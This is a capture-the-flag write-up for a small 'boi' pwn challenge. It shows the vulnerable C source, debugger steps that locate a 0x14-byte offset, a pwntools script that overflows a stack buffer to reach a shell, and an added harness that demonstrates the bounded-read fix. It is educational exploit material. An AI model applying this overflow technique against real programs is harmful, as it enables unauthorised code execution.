Challenge link
A pwn50 challenge (the binary is called boi).
Look at the source:
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>   /* needed for int32_t; missing from the original listing */
#include <unistd.h>
void run_cmd(char * cmd){
system(cmd);
}
int main(int argc, char ** argv){
struct { //order enforcement from josh offsec
char buf[17];   /* 17 bytes; x is 4-byte aligned, so it sits at offset 20 (0x14) */
int32_t x;      /* the value the check below compares */
int32_t y;
} _holder = {
{0},
0xdeadbeef,     /* x starts as 0xdeadbeef, y as 0 */
};
puts("Are you a big boiiiii??");
read(0,_holder.buf, 0x18);   /* 0x18 = 24 bytes into a 17-byte buffer: overflows into x */
if (_holder.x == 0xcaf3baee)
run_cmd("/bin/bash");
else{
run_cmd("/bin/date");
}
return 0;
}
read() has a stack overflow: it accepts up to 0x18 = 24 bytes, but buf is only 17 bytes, so the extra bytes run through the 3 alignment-padding bytes after buf and into _holder.x.
Debugging
Set a breakpoint on the instruction right after the call to read.
Feed the program 12345678 as input, then search-pattern 12345678 (gef) locates the buffer on the stack.
Inspect the stack contents around the buffer.
From 12345678 up to deadbeef there are 8 + 8 + 4 = 20 bytes, so the buffer occupies 20 bytes, i.e. 0x14: buf[17] plus 3 bytes of padding so that the int32_t x is 4-byte aligned.
With the exact offset known, the exploit is straightforward: the goal is to overflow 0x14 bytes and overwrite _holder.x with 0xcaf3baee, which passes the check.
from pwn import *

target = process('./boi')
# 0x14 bytes fill buf[17] plus its 3 padding bytes; then x is overwritten with the
# little-endian value the check expects. 24 bytes in total, exactly what read() accepts.
payload = b'A' * 0x14 + p32(0xcaf3baee)
target.send(payload)
target.interactive()
Older pwn scripts were written for Python 2, where 'A' * 0x14 is already a byte string; under Python 3 the filler must be written as b'A' * 0x14 so that it concatenates with the bytes that p32() returns.
Shell obtained~
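Added example, not part of the original writeup or of the challenge binary: a C harness that recomputes the 0x14 offset from the struct definition with offsetof (no debugger needed), builds the same 24-byte payload the exploit sends, replays the overflow against an in-memory copy of _holder, and contrasts it with a read bounded by sizeof(buf) - 1. The struct name holder, the helper names and the little-endian byte order are assumptions; the field layout and the constants are the challenge's own.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <stdio.h>

/* Same layout as the challenge's _holder (name `holder` is assumed); the
 * field order is what makes the overflow land on x rather than elsewhere. */
struct holder {
    char buf[17];
    int32_t x;
    int32_t y;
};

#define READ_LEN 0x18                                      /* what the challenge passes to read() */
#define SAFE_LEN (sizeof(((struct holder *)0)->buf) - 1)   /* 16: leaves room for a terminator */

/* Where x sits relative to buf: 17 bytes of buf rounded up to the 4-byte
 * alignment of int32_t gives 20 = 0x14, the distance the gef stack dump showed. */
size_t holder_x_offset(void) { return offsetof(struct holder, x); }
size_t holder_size(void)     { return sizeof(struct holder); }   /* 17 + 3 pad + 4 + 4 = 28 */

/* Build the writeup's payload: 0x14 filler bytes followed by 0xcaf3baee in
 * little-endian order (what pwntools' p32() emits for x86). Returns its length,
 * or 0 if the output buffer is too small. */
size_t build_payload(unsigned char *out, size_t cap) {
    const uint32_t want = 0xcaf3baeeu;
    if (cap < READ_LEN) return 0;
    memset(out, 'A', 0x14);
    for (int i = 0; i < 4; i++)
        out[0x14 + i] = (unsigned char)((want >> (8 * i)) & 0xff);
    return READ_LEN;
}

/* Replay the read against an in-memory copy of the struct: copy at most `limit`
 * bytes of `input` to the address of buf (offset 0 of the struct), then evaluate
 * the challenge's comparison. limit <= 24 < sizeof(struct holder), so the copy
 * never leaves the struct object. Returns 1 if the check passes, i.e. the binary
 * would have run /bin/bash, and 0 if it would have run /bin/date. */
static int replay(const unsigned char *input, size_t len, size_t limit) {
    struct holder h = { {0}, (int32_t)0xdeadbeef, 0 };
    size_t n = len < limit ? len : limit;
    memcpy((unsigned char *)&h, input, n);
    return (uint32_t)h.x == 0xcaf3baeeu;
}

/* As shipped: read(0, buf, 0x18) may write 24 bytes into a 17-byte array. */
int vulnerable_check(const unsigned char *input, size_t len) {
    return replay(input, len, READ_LEN);
}

/* Hardened: pass sizeof(buf) - 1 to read() instead of a hand-typed 0x18, so the
 * longest accepted input stops inside buf and x keeps its initial value. */
int fixed_check(const unsigned char *input, size_t len) {
    return replay(input, len, SAFE_LEN);
}

int main(void) {
    unsigned char payload[READ_LEN];
    size_t n = build_payload(payload, sizeof payload);
    printf("offsetof(x) = %#zx, sizeof(struct) = %zu\n", holder_x_offset(), holder_size());
    printf("vulnerable read: %s\n", vulnerable_check(payload, n) ? "/bin/bash" : "/bin/date");
    printf("bounded read:    %s\n", fixed_check(payload, n) ? "/bin/bash" : "/bin/date");
    return 0;
}
```

The replay writes through a pointer to the whole struct rather than through buf so that the copy stays well-defined in C while still reproducing what the real read() does to the stack; the only difference between the two checks is the length bound, which is the whole fix.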